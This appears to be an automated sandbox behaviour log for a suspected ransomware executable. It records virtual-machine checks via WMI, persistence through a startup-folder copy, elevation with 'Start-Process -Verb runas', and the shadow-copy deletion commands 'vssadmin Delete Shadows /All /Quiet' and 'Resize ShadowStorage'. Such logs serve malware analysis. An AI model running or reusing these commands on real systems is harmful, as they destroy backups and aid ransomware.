Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2850	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2330	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2370	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2062	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1936
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2405
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1821
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1970
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 973

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4164	Thread sleep count: 2850 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4164	Thread sleep count: 2330 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6032	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3028	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224	Thread sleep count: 1936 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036	Thread sleep count: 331 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2388	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6260	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3792	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4696	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_computersystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_computersystem
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_computersystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

Code function: 0_2_00007FF606E64F30 memset,FindFirstFileW,memmove,GetLastError,

0_2_00007FF606E64F30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Source: winstrt10.exe, 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp	Binary or memory string: model : VirtualBoxmodel : VMware Virtual Platformmodel : Virtual Machine
Source: powershell.exe, 0000001C.00000002.765057371.000001994F220000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: winstrt10.exe, 00000016.00000002.794120960.0000028037C58000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: IJht2pqbVh.exe, 00000000.00000002.674222978.000002230EA88000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

0_2_00007FF606E9DDD0

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

Code function: 0_2_00007FF606E60B10 GetProcessHeap,

0_2_00007FF606E60B10

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: 0_2_00007FF606EC1194 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00007FF606EC1194
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D251194 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		22_2_00007FF78D251194

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' get-wmiobject win32_computersystem \| fl model	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\rstrt.bat''	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' get-wmiobject win32_computersystem \| fl model	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat'
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

Code function: 0_2_00007FF606E3F3B0 cpuid

0_2_00007FF606E3F3B0

Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Pictures VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Videos VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\20210411 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Pictures VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\20210411\PowerShell_transcript.134349.sQj2rdHh.20210411125629.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\BQJUWOYRTO.mp3 VolumeInformation	Jump to behavior
